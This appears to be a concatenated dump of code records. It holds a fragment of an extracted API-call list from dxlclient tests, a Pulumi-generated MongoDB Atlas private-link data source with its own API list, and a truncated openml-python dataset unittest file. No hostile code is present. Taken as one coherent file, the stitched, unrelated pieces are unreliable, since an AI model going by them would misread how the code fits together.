'DxlClient', (['self.config'], {}), '(self.config)\n', (8407, 8420), False, 'from dxlclient import DxlClient\n'), ((8598, 8613), 'mock.patch.stopall', 'patch.stopall', ([], {}), '()\n', (8611, 8613), False, 'from mock import Mock, patch\n'), ((9095, 9108), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (9105, 9108), False, 'import time\n'), ((9473, 9496), 'mock.Mock', 'Mock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (9477, 9496), False, 'from mock import Mock, patch\n'), ((10403, 10432), 'dxlclient.Broker', 'Broker', ([], {'host_name': '"""localhost"""'}), "(host_name='localhost')\n", (10409, 10432), False, 'from dxlclient import Broker\n'), ((10935, 10958), 'mock.Mock', 
'Mock', ([], {'return_value': 'None'}), '(return_value=None)\n', (10939, 10958), False, 'from mock import Mock, patch\n'), ((11321, 11344), 'mock.Mock', 'Mock', ([], {'return_value': 'None'}), '(return_value=None)\n', (11325, 11344), False, 'from mock import Mock, patch\n'), ((11852, 11875), 'mock.Mock', 'Mock', ([], {'return_value': 'None'}), '(return_value=None)\n', (11856, 11875), False, 'from mock import Mock, patch\n'), ((11909, 11932), 'mock.Mock', 'Mock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (11913, 11932), False, 'from mock import Mock, patch\n'), ((12436, 12451), 'dxlclient.EventCallback', 'EventCallback', ([], {}), '()\n', (12449, 12451), False, 'from dxlclient import EventCallback\n'), ((12486, 12492), 'mock.Mock', 'Mock', ([], {}), '()\n', (12490, 12492), False, 'from mock import Mock, patch\n'), ((12938, 12955), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (12953, 12955), False, 'from dxlclient import RequestCallback\n'), ((12990, 12996), 'mock.Mock', 'Mock', ([], {}), '()\n', (12994, 12996), False, 'from mock import Mock, patch\n'), ((13444, 13462), 'dxlclient.ResponseCallback', 'ResponseCallback', ([], {}), '()\n', (13460, 13462), False, 'from dxlclient import ResponseCallback\n'), ((13494, 13500), 'mock.Mock', 'Mock', ([], {}), '()\n', (13498, 13500), False, 'from mock import Mock, patch\n'), ((13930, 13953), 'mock.Mock', 'Mock', ([], {'return_value': 'None'}), '(return_value=None)\n', (13934, 13953), False, 'from mock import Mock, patch\n'), ((14005, 14032), 'dxlclient.Event', 'Event', ([], {'destination_topic': '""""""'}), "(destination_topic='')\n", (14010, 14032), False, 'from dxlclient import Event\n'), ((14289, 14312), 'mock.Mock', 'Mock', ([], {'return_value': 'None'}), '(return_value=None)\n', (14293, 14312), False, 'from mock import Mock, patch\n'), ((14364, 14393), 'dxlclient.Request', 'Request', ([], {'destination_topic': '""""""'}), "(destination_topic='')\n", (14371, 14393), False, 'from dxlclient import Request\n'), ((14654, 14677), 'mock.Mock', 'Mock', ([], {'return_value': 'None'}), '(return_value=None)\n', (14658, 14677), False, 'from mock import Mock, patch\n'), ((14729, 14751), 'dxlclient.Response', 'Response', ([], {'request': 'None'}), '(request=None)\n', (14737, 14751), False, 'from dxlclient import Response\n'), ((15014, 15037), 'mock.Mock', 'Mock', ([], {'return_value': 'None'}), '(return_value=None)\n', (15018, 15037), False, 'from mock import Mock, patch\n'), ((15089, 15162), 'dxlclient.ErrorResponse', 'ErrorResponse', ([], {'request': 'None', 'error_code': '(666)', 'error_message': '"""test message"""'}), "(request=None, error_code=666, error_message='test message')\n", (15102, 15162), False, 'from dxlclient import ErrorResponse\n'), ((17005, 17028), 'mock.Mock', 'Mock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (17009, 17028), False, 'from mock import Mock, patch\n'), ((17062, 17085), 'mock.Mock', 'Mock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (17066, 17085), False, 'from mock import Mock, patch\n'), ((17189, 17202), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (17199, 17202), False, 'import time\n'), ((3384, 3399), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (3394, 3399), False, 'import time\n'), ((6270, 6326), 'dxlclient.DxlClientConfig.create_dxl_config_from_file', 'DxlClientConfig.create_dxl_config_from_file', (['"""mock_file"""'], {}), "('mock_file')\n", (6313, 6326), False, 'from dxlclient import DxlClientConfig\n'), ((6972, 7045), 
'dxlclient.DxlClientConfig.create_dxl_config_from_file', 'DxlClientConfig.create_dxl_config_from_file', (['"""this_file_doesnt_exist.cfg"""'], {}), "('this_file_doesnt_exist.cfg')\n", (7015, 7045), False, 'from dxlclient import DxlClientConfig\n'), ((7827, 7887), 'dxlclient.DxlClientConfig.create_dxl_config_from_file', 'DxlClientConfig.create_dxl_config_from_file', (['"""mock_file.cfg"""'], {}), "('mock_file.cfg')\n", (7870, 7887), False, 'from dxlclient import DxlClientConfig\n'), ((15865, 15882), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (15880, 15882), False, 'from dxlclient import RequestCallback\n'), ((15925, 15942), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (15940, 15942), False, 'from dxlclient import RequestCallback\n'), ((17692, 17709), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (17707, 17709), False, 'from dxlclient import RequestCallback\n'), ((17752, 17769), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (17767, 17769), False, 'from dxlclient import RequestCallback\n'), ((18816, 18833), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (18831, 18833), False, 'from dxlclient import RequestCallback\n'), ((18876, 18893), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (18891, 18893), False, 'from dxlclient import RequestCallback\n'), ((19206, 19223), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (19221, 19223), False, 'from dxlclient import RequestCallback\n'), ((19266, 19283), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (19281, 19283), False, 'from dxlclient import RequestCallback\n'), ((21141, 21154), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (21151, 21154), False, 'import time\n'), ((21307, 21322), 'dxlclient.EventCallback', 'EventCallback', ([], {}), '()\n', (21320, 21322), False, 'from dxlclient import EventCallback\n'), ((21356, 21362), 'mock.Mock', 'Mock', ([], {}), '()\n', (21360, 21362), False, 'from mock import Mock, patch\n'), ((21532, 21567), 'dxlclient.Event', 'Event', ([], {'destination_topic': 'test_topic'}), '(destination_topic=test_topic)\n', (21537, 21567), False, 'from dxlclient import Event\n'), ((21616, 21629), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (21626, 21629), False, 'import time\n'), ((21819, 21832), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (21829, 21832), False, 'import time\n'), ((21913, 21948), 'dxlclient.Event', 'Event', ([], {'destination_topic': 'test_topic'}), '(destination_topic=test_topic)\n', (21918, 21948), False, 'from dxlclient import Event\n'), ((21997, 22010), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (22007, 22010), False, 'import time\n'), ((22539, 22552), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (22549, 22552), False, 'import time\n'), ((22695, 22732), 'dxlclient.Request', 'Request', ([], {'destination_topic': 'test_topic'}), '(destination_topic=test_topic)\n', (22702, 22732), False, 'from dxlclient import Request\n'), ((22762, 22799), 'dxlclient.UuidGenerator.generate_id_as_string', 'UuidGenerator.generate_id_as_string', ([], {}), '()\n', (22797, 22799), False, 'from dxlclient import UuidGenerator\n'), ((7454, 7514), 'dxlclient.DxlClientConfig.create_dxl_config_from_file', 'DxlClientConfig.create_dxl_config_from_file', (['"""mock_file.cfg"""'], {}), "('mock_file.cfg')\n", (7497, 7514), False, 'from dxlclient import DxlClientConfig\n'), ((8496, 8518), 'dxlclient.Response', 'Response', ([], {'request': 'None'}), 
'(request=None)\n', (8504, 8518), False, 'from dxlclient import Response\n'), ((10455, 10492), 'dxlclient.UuidGenerator.generate_id_as_string', 'UuidGenerator.generate_id_as_string', ([], {}), '()\n', (10490, 10492), False, 'from dxlclient import UuidGenerator\n'), ((12616, 12658), 'dxlclient.Event', 'Event', ([], {'destination_topic': 'self.test_channel'}), '(destination_topic=self.test_channel)\n', (12621, 12658), False, 'from dxlclient import Event\n'), ((13122, 13166), 'dxlclient.Request', 'Request', ([], {'destination_topic': 'self.test_channel'}), '(destination_topic=self.test_channel)\n', (13129, 13166), False, 'from dxlclient import Request\n'), ((13624, 13646), 'dxlclient.Response', 'Response', ([], {'request': 'None'}), '(request=None)\n', (13632, 13646), False, 'from dxlclient import Response\n'), ((20487, 20524), 'dxlclient.UuidGenerator.generate_id_as_string', 'UuidGenerator.generate_id_as_string', ([], {}), '()\n', (20522, 20524), False, 'from dxlclient import UuidGenerator\n'), ((6221, 6238), 'textwrap.dedent', 'dedent', (['read_data'], {}), '(read_data)\n', (6227, 6238), False, 'from textwrap import dedent\n'), ((7369, 7386), 'textwrap.dedent', 'dedent', (['read_data'], {}), '(read_data)\n', (7375, 7386), False, 'from textwrap import dedent\n'), ((7778, 7795), 'textwrap.dedent', 'dedent', (['read_data'], {}), '(read_data)\n', (7784, 7795), False, 'from textwrap import dedent\n')]
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = [
'GetPrivateLinkEndpointServiceResult',
'AwaitableGetPrivateLinkEndpointServiceResult',
'get_private_link_endpoint_service',
]
@pulumi.output_type
class GetPrivateLinkEndpointServiceResult:
"""
A collection of values returned by getPrivateLinkEndpointService.
"""
def __init__(__self__, aws_connection_status=None, azure_status=None, delete_requested=None, endpoint_service_id=None, error_message=None, id=None, interface_endpoint_id=None, private_endpoint_connection_name=None, private_endpoint_ip_address=None, private_endpoint_resource_id=None, private_link_id=None, project_id=None, provider_name=None):
if aws_connection_status and not isinstance(aws_connection_status, str):
raise TypeError("Expected argument 'aws_connection_status' to be a str")
pulumi.set(__self__, "aws_connection_status", aws_connection_status)
if azure_status and not isinstance(azure_status, str):
raise TypeError("Expected argument 'azure_status' to be a str")
pulumi.set(__self__, "azure_status", azure_status)
if delete_requested and not isinstance(delete_requested, bool):
raise TypeError("Expected argument 'delete_requested' to be a bool")
pulumi.set(__self__, "delete_requested", delete_requested)
if endpoint_service_id and not isinstance(endpoint_service_id, str):
raise TypeError("Expected argument 'endpoint_service_id' to be a str")
pulumi.set(__self__, "endpoint_service_id", endpoint_service_id)
if error_message and not isinstance(error_message, str):
raise TypeError("Expected argument 'error_message' to be a str")
pulumi.set(__self__, "error_message", error_message)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if interface_endpoint_id and not isinstance(interface_endpoint_id, str):
raise TypeError("Expected argument 'interface_endpoint_id' to be a str")
pulumi.set(__self__, "interface_endpoint_id", interface_endpoint_id)
if private_endpoint_connection_name and not isinstance(private_endpoint_connection_name, str):
raise TypeError("Expected argument 'private_endpoint_connection_name' to be a str")
pulumi.set(__self__, "private_endpoint_connection_name", private_endpoint_connection_name)
if private_endpoint_ip_address and not isinstance(private_endpoint_ip_address, str):
raise TypeError("Expected argument 'private_endpoint_ip_address' to be a str")
pulumi.set(__self__, "private_endpoint_ip_address", private_endpoint_ip_address)
if private_endpoint_resource_id and not isinstance(private_endpoint_resource_id, str):
raise TypeError("Expected argument 'private_endpoint_resource_id' to be a str")
pulumi.set(__self__, "private_endpoint_resource_id", private_endpoint_resource_id)
if private_link_id and not isinstance(private_link_id, str):
raise TypeError("Expected argument 'private_link_id' to be a str")
pulumi.set(__self__, "private_link_id", private_link_id)
if project_id and not isinstance(project_id, str):
raise TypeError("Expected argument 'project_id' to be a str")
pulumi.set(__self__, "project_id", project_id)
if provider_name and not isinstance(provider_name, str):
raise TypeError("Expected argument 'provider_name' to be a str")
pulumi.set(__self__, "provider_name", provider_name)
@property
@pulumi.getter(name="awsConnectionStatus")
def aws_connection_status(self) -> str:
"""
Status of the interface endpoint for AWS.
        Returns one of the status values defined by Atlas.
"""
return pulumi.get(self, "aws_connection_status")
@property
@pulumi.getter(name="azureStatus")
def azure_status(self) -> str:
"""
Status of the interface endpoint for AZURE.
        Returns one of the status values defined by Atlas.
"""
return pulumi.get(self, "azure_status")
@property
@pulumi.getter(name="deleteRequested")
def delete_requested(self) -> bool:
"""
Indicates if Atlas received a request to remove the interface endpoint from the private endpoint connection.
"""
return pulumi.get(self, "delete_requested")
@property
@pulumi.getter(name="endpointServiceId")
def endpoint_service_id(self) -> str:
return pulumi.get(self, "endpoint_service_id")
@property
@pulumi.getter(name="errorMessage")
def error_message(self) -> str:
"""
Error message pertaining to the interface endpoint. Returns null if there are no errors.
"""
return pulumi.get(self, "error_message")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="interfaceEndpointId")
def interface_endpoint_id(self) -> str:
"""
Unique identifier of the interface endpoint.
"""
return pulumi.get(self, "interface_endpoint_id")
@property
@pulumi.getter(name="privateEndpointConnectionName")
def private_endpoint_connection_name(self) -> str:
"""
Name of the connection for this private endpoint that Atlas generates.
"""
return pulumi.get(self, "private_endpoint_connection_name")
@property
@pulumi.getter(name="privateEndpointIpAddress")
def private_endpoint_ip_address(self) -> str:
"""
Private IP address of the private endpoint network interface.
"""
return pulumi.get(self, "private_endpoint_ip_address")
@property
@pulumi.getter(name="privateEndpointResourceId")
def private_endpoint_resource_id(self) -> str:
"""
Unique identifier of the private endpoint.
"""
return pulumi.get(self, "private_endpoint_resource_id")
@property
@pulumi.getter(name="privateLinkId")
def private_link_id(self) -> str:
return pulumi.get(self, "private_link_id")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> str:
return pulumi.get(self, "project_id")
@property
@pulumi.getter(name="providerName")
def provider_name(self) -> str:
return pulumi.get(self, "provider_name")
class AwaitableGetPrivateLinkEndpointServiceResult(GetPrivateLinkEndpointServiceResult):
# pylint: disable=using-constant-test
def __await__(self):
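        # The unreachable `yield` below keeps __await__ a generator function,
        # so awaiting this result completes immediately with the returned value.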
if False:
yield self
return GetPrivateLinkEndpointServiceResult(
aws_connection_status=self.aws_connection_status,
azure_status=self.azure_status,
delete_requested=self.delete_requested,
endpoint_service_id=self.endpoint_service_id,
error_message=self.error_message,
id=self.id,
interface_endpoint_id=self.interface_endpoint_id,
private_endpoint_connection_name=self.private_endpoint_connection_name,
private_endpoint_ip_address=self.private_endpoint_ip_address,
private_endpoint_resource_id=self.private_endpoint_resource_id,
private_link_id=self.private_link_id,
project_id=self.project_id,
provider_name=self.provider_name)
def get_private_link_endpoint_service(endpoint_service_id: Optional[str] = None,
private_link_id: Optional[str] = None,
project_id: Optional[str] = None,
provider_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPrivateLinkEndpointServiceResult:
"""
`PrivateLinkEndpointService` describe a Private Endpoint Link. This represents a Private Endpoint Link Connection that wants to retrieve details in an Atlas project.
> **NOTE:** Groups and projects are synonymous terms. You may find group_id in the official documentation.
:param str endpoint_service_id: Unique identifier of the `AWS` or `AZURE` resource.
:param str private_link_id: Unique identifier of the private endpoint service for which you want to retrieve a private endpoint.
:param str project_id: Unique identifier for the project.
:param str provider_name: Cloud provider for which you want to create a private endpoint. Atlas accepts `AWS` or `AZURE`.
"""
__args__ = dict()
__args__['endpointServiceId'] = endpoint_service_id
__args__['privateLinkId'] = private_link_id
__args__['projectId'] = project_id
__args__['providerName'] = provider_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('mongodbatlas:index/getPrivateLinkEndpointService:getPrivateLinkEndpointService', __args__, opts=opts, typ=GetPrivateLinkEndpointServiceResult).value
return AwaitableGetPrivateLinkEndpointServiceResult(
aws_connection_status=__ret__.aws_connection_status,
azure_status=__ret__.azure_status,
delete_requested=__ret__.delete_requested,
endpoint_service_id=__ret__.endpoint_service_id,
error_message=__ret__.error_message,
id=__ret__.id,
interface_endpoint_id=__ret__.interface_endpoint_id,
private_endpoint_connection_name=__ret__.private_endpoint_connection_name,
private_endpoint_ip_address=__ret__.private_endpoint_ip_address,
private_endpoint_resource_id=__ret__.private_endpoint_resource_id,
private_link_id=__ret__.private_link_id,
project_id=__ret__.project_id,
provider_name=__ret__.provider_name)
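# A minimal sketch of how the data source above is consumed in a Pulumi
# program; every identifier below is a placeholder:
# endpoint = get_private_link_endpoint_service(
#     project_id="<project-id>",
#     private_link_id="<private-link-id>",
#     endpoint_service_id="<endpoint-service-id>",
#     provider_name="AWS")
# pulumi.export("awsConnectionStatus", endpoint.aws_connection_status)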
|
[
"pulumi.get",
"pulumi.getter",
"pulumi.set",
"pulumi.InvokeOptions",
"pulumi.runtime.invoke"
] |
[((3941, 3982), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""awsConnectionStatus"""'}), "(name='awsConnectionStatus')\n", (3954, 3982), False, 'import pulumi\n'), ((4223, 4256), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""azureStatus"""'}), "(name='azureStatus')\n", (4236, 4256), False, 'import pulumi\n'), ((4481, 4518), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""deleteRequested"""'}), "(name='deleteRequested')\n", (4494, 4518), False, 'import pulumi\n'), ((4772, 4811), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""endpointServiceId"""'}), "(name='endpointServiceId')\n", (4785, 4811), False, 'import pulumi\n'), ((4929, 4963), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""errorMessage"""'}), "(name='errorMessage')\n", (4942, 4963), False, 'import pulumi\n'), ((5378, 5419), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""interfaceEndpointId"""'}), "(name='interfaceEndpointId')\n", (5391, 5419), False, 'import pulumi\n'), ((5618, 5669), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""privateEndpointConnectionName"""'}), "(name='privateEndpointConnectionName')\n", (5631, 5669), False, 'import pulumi\n'), ((5916, 5962), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""privateEndpointIpAddress"""'}), "(name='privateEndpointIpAddress')\n", (5929, 5962), False, 'import pulumi\n'), ((6190, 6237), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""privateEndpointResourceId"""'}), "(name='privateEndpointResourceId')\n", (6203, 6237), False, 'import pulumi\n'), ((6448, 6483), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""privateLinkId"""'}), "(name='privateLinkId')\n", (6461, 6483), False, 'import pulumi\n'), ((6593, 6624), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""projectId"""'}), "(name='projectId')\n", (6606, 6624), False, 'import pulumi\n'), ((6724, 6758), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""providerName"""'}), "(name='providerName')\n", (6737, 6758), False, 'import pulumi\n'), ((1154, 1222), 'pulumi.set', 'pulumi.set', (['__self__', '"""aws_connection_status"""', 'aws_connection_status'], {}), "(__self__, 'aws_connection_status', aws_connection_status)\n", (1164, 1222), False, 'import pulumi\n'), ((1370, 1420), 'pulumi.set', 'pulumi.set', (['__self__', '"""azure_status"""', 'azure_status'], {}), "(__self__, 'azure_status', azure_status)\n", (1380, 1420), False, 'import pulumi\n'), ((1582, 1640), 'pulumi.set', 'pulumi.set', (['__self__', '"""delete_requested"""', 'delete_requested'], {}), "(__self__, 'delete_requested', delete_requested)\n", (1592, 1640), False, 'import pulumi\n'), ((1809, 1873), 'pulumi.set', 'pulumi.set', (['__self__', '"""endpoint_service_id"""', 'endpoint_service_id'], {}), "(__self__, 'endpoint_service_id', endpoint_service_id)\n", (1819, 1873), False, 'import pulumi\n'), ((2024, 2076), 'pulumi.set', 'pulumi.set', (['__self__', '"""error_message"""', 'error_message'], {}), "(__self__, 'error_message', error_message)\n", (2034, 2076), False, 'import pulumi\n'), ((2194, 2224), 'pulumi.set', 'pulumi.set', (['__self__', '"""id"""', 'id'], {}), "(__self__, 'id', id)\n", (2204, 2224), False, 'import pulumi\n'), ((2399, 2467), 'pulumi.set', 'pulumi.set', (['__self__', '"""interface_endpoint_id"""', 'interface_endpoint_id'], {}), "(__self__, 'interface_endpoint_id', interface_endpoint_id)\n", (2409, 2467), False, 'import pulumi\n'), ((2675, 2769), 'pulumi.set', 'pulumi.set', (['__self__', '"""private_endpoint_connection_name"""', 'private_endpoint_connection_name'], {}), "(__self__, 
'private_endpoint_connection_name',\n private_endpoint_connection_name)\n", (2685, 2769), False, 'import pulumi\n'), ((2958, 3043), 'pulumi.set', 'pulumi.set', (['__self__', '"""private_endpoint_ip_address"""', 'private_endpoint_ip_address'], {}), "(__self__, 'private_endpoint_ip_address', private_endpoint_ip_address\n )\n", (2968, 3043), False, 'import pulumi\n'), ((3234, 3320), 'pulumi.set', 'pulumi.set', (['__self__', '"""private_endpoint_resource_id"""', 'private_endpoint_resource_id'], {}), "(__self__, 'private_endpoint_resource_id',\n private_endpoint_resource_id)\n", (3244, 3320), False, 'import pulumi\n'), ((3473, 3529), 'pulumi.set', 'pulumi.set', (['__self__', '"""private_link_id"""', 'private_link_id'], {}), "(__self__, 'private_link_id', private_link_id)\n", (3483, 3529), False, 'import pulumi\n'), ((3671, 3717), 'pulumi.set', 'pulumi.set', (['__self__', '"""project_id"""', 'project_id'], {}), "(__self__, 'project_id', project_id)\n", (3681, 3717), False, 'import pulumi\n'), ((3868, 3920), 'pulumi.set', 'pulumi.set', (['__self__', '"""provider_name"""', 'provider_name'], {}), "(__self__, 'provider_name', provider_name)\n", (3878, 3920), False, 'import pulumi\n'), ((4161, 4202), 'pulumi.get', 'pulumi.get', (['self', '"""aws_connection_status"""'], {}), "(self, 'aws_connection_status')\n", (4171, 4202), False, 'import pulumi\n'), ((4428, 4460), 'pulumi.get', 'pulumi.get', (['self', '"""azure_status"""'], {}), "(self, 'azure_status')\n", (4438, 4460), False, 'import pulumi\n'), ((4715, 4751), 'pulumi.get', 'pulumi.get', (['self', '"""delete_requested"""'], {}), "(self, 'delete_requested')\n", (4725, 4751), False, 'import pulumi\n'), ((4869, 4908), 'pulumi.get', 'pulumi.get', (['self', '"""endpoint_service_id"""'], {}), "(self, 'endpoint_service_id')\n", (4879, 4908), False, 'import pulumi\n'), ((5136, 5169), 'pulumi.get', 'pulumi.get', (['self', '"""error_message"""'], {}), "(self, 'error_message')\n", (5146, 5169), False, 'import pulumi\n'), ((5335, 5357), 'pulumi.get', 'pulumi.get', (['self', '"""id"""'], {}), "(self, 'id')\n", (5345, 5357), False, 'import pulumi\n'), ((5556, 5597), 'pulumi.get', 'pulumi.get', (['self', '"""interface_endpoint_id"""'], {}), "(self, 'interface_endpoint_id')\n", (5566, 5597), False, 'import pulumi\n'), ((5843, 5895), 'pulumi.get', 'pulumi.get', (['self', '"""private_endpoint_connection_name"""'], {}), "(self, 'private_endpoint_connection_name')\n", (5853, 5895), False, 'import pulumi\n'), ((6122, 6169), 'pulumi.get', 'pulumi.get', (['self', '"""private_endpoint_ip_address"""'], {}), "(self, 'private_endpoint_ip_address')\n", (6132, 6169), False, 'import pulumi\n'), ((6379, 6427), 'pulumi.get', 'pulumi.get', (['self', '"""private_endpoint_resource_id"""'], {}), "(self, 'private_endpoint_resource_id')\n", (6389, 6427), False, 'import pulumi\n'), ((6537, 6572), 'pulumi.get', 'pulumi.get', (['self', '"""private_link_id"""'], {}), "(self, 'private_link_id')\n", (6547, 6572), False, 'import pulumi\n'), ((6673, 6703), 'pulumi.get', 'pulumi.get', (['self', '"""project_id"""'], {}), "(self, 'project_id')\n", (6683, 6703), False, 'import pulumi\n'), ((6810, 6843), 'pulumi.get', 'pulumi.get', (['self', '"""provider_name"""'], {}), "(self, 'provider_name')\n", (6820, 6843), False, 'import pulumi\n'), ((9207, 9229), 'pulumi.InvokeOptions', 'pulumi.InvokeOptions', ([], {}), '()\n', (9227, 9229), False, 'import pulumi\n'), ((9321, 9496), 'pulumi.runtime.invoke', 'pulumi.runtime.invoke', 
(['"""mongodbatlas:index/getPrivateLinkEndpointService:getPrivateLinkEndpointService"""', '__args__'], {'opts': 'opts', 'typ': 'GetPrivateLinkEndpointServiceResult'}), "(\n 'mongodbatlas:index/getPrivateLinkEndpointService:getPrivateLinkEndpointService'\n , __args__, opts=opts, typ=GetPrivateLinkEndpointServiceResult)\n", (9342, 9496), False, 'import pulumi\n')]
|
import unittest
import os
import sys
if sys.version_info[0] >= 3:
from unittest import mock
else:
import mock
from oslo_concurrency import lockutils
import scipy.sparse
import openml
from openml import OpenMLDataset
from openml.exceptions import OpenMLCacheException, PyOpenMLError
from openml.testing import TestBase
from openml.datasets.functions import (_get_cached_dataset,
_get_cached_dataset_features,
_get_cached_dataset_qualities,
_get_cached_datasets,
_get_dataset_description,
_get_dataset_arff,
_get_dataset_features,
_get_dataset_qualities)
class TestOpenMLDataset(TestBase):
_multiprocess_can_split_ = True
def setUp(self):
super(TestOpenMLDataset, self).setUp()
def tearDown(self):
self._remove_pickle_files()
super(TestOpenMLDataset, self).tearDown()
def _remove_pickle_files(self):
cache_dir = self.static_cache_dir
for did in ['-1', '2']:
with lockutils.external_lock(
name='datasets.functions.get_dataset:%s' % did,
lock_path=os.path.join(openml.config.get_cache_directory(), 'locks'),
):
pickle_path = os.path.join(cache_dir, 'datasets', did,
'dataset.pkl')
try:
os.remove(pickle_path)
                except OSError:
pass
def test__list_cached_datasets(self):
openml.config.set_cache_directory(self.static_cache_dir)
cached_datasets = openml.datasets.functions._list_cached_datasets()
self.assertIsInstance(cached_datasets, list)
self.assertEqual(len(cached_datasets), 2)
self.assertIsInstance(cached_datasets[0], int)
@mock.patch('openml.datasets.functions._list_cached_datasets')
def test__get_cached_datasets(self, _list_cached_datasets_mock):
openml.config.set_cache_directory(self.static_cache_dir)
_list_cached_datasets_mock.return_value = [-1, 2]
datasets = _get_cached_datasets()
self.assertIsInstance(datasets, dict)
self.assertEqual(len(datasets), 2)
self.assertIsInstance(list(datasets.values())[0], OpenMLDataset)
def test__get_cached_dataset(self, ):
openml.config.set_cache_directory(self.static_cache_dir)
dataset = _get_cached_dataset(2)
features = _get_cached_dataset_features(2)
qualities = _get_cached_dataset_qualities(2)
self.assertIsInstance(dataset, OpenMLDataset)
self.assertTrue(len(dataset.features) > 0)
self.assertTrue(len(dataset.features) == len(features['oml:feature']))
self.assertTrue(len(dataset.qualities) == len(qualities))
def test_get_cached_dataset_description(self):
openml.config.set_cache_directory(self.static_cache_dir)
description = openml.datasets.functions._get_cached_dataset_description(2)
self.assertIsInstance(description, dict)
def test_get_cached_dataset_description_not_cached(self):
openml.config.set_cache_directory(self.static_cache_dir)
self.assertRaisesRegexp(OpenMLCacheException, "Dataset description for "
"dataset id 3 not cached",
openml.datasets.functions._get_cached_dataset_description,
3)
def test_get_cached_dataset_arff(self):
openml.config.set_cache_directory(self.static_cache_dir)
description = openml.datasets.functions._get_cached_dataset_arff(
dataset_id=2)
self.assertIsInstance(description, str)
def test_get_cached_dataset_arff_not_cached(self):
openml.config.set_cache_directory(self.static_cache_dir)
self.assertRaisesRegexp(OpenMLCacheException, "ARFF file for "
"dataset id 3 not cached",
openml.datasets.functions._get_cached_dataset_arff,
3)
def test_list_datasets(self):
# We can only perform a smoke test here because we test on dynamic
# data from the internet...
datasets = openml.datasets.list_datasets()
        # openml.org listed 1087 datasets at the time of writing; 100 is a safe lower bound
self.assertGreaterEqual(len(datasets), 100)
for did in datasets:
self._check_dataset(datasets[did])
def test_list_datasets_by_tag(self):
datasets = openml.datasets.list_datasets(tag='study_14')
self.assertGreaterEqual(len(datasets), 100)
for did in datasets:
self._check_dataset(datasets[did])
def test_list_datasets_paginate(self):
size = 10
        max_offset = 100
        for i in range(0, max_offset, size):
datasets = openml.datasets.list_datasets(offset=i, size=size)
self.assertGreaterEqual(size, len(datasets))
for did in datasets:
self._check_dataset(datasets[did])
@unittest.skip('See https://github.com/openml/openml-python/issues/149')
def test_check_datasets_active(self):
active = openml.datasets.check_datasets_active([1, 17])
self.assertTrue(active[1])
self.assertFalse(active[17])
self.assertRaisesRegexp(ValueError, 'Could not find dataset 79 in OpenML'
' dataset list.',
openml.datasets.check_datasets_active, [79])
def test_get_datasets(self):
dids = [1, 2]
datasets = openml.datasets.get_datasets(dids)
self.assertEqual(len(datasets), 2)
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "description.xml")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "2", "description.xml")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "dataset.arff")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "2", "dataset.arff")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "features.xml")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "2", "features.xml")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "qualities.xml")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "2", "qualities.xml")))
def test_get_dataset(self):
dataset = openml.datasets.get_dataset(1)
self.assertEqual(type(dataset), OpenMLDataset)
self.assertEqual(dataset.name, 'anneal')
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "description.xml")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "dataset.arff")))
self.assertTrue(os.path.exists(os.path.join(
openml.config.get_cache_directory(), "datasets", "1", "features.xml")))
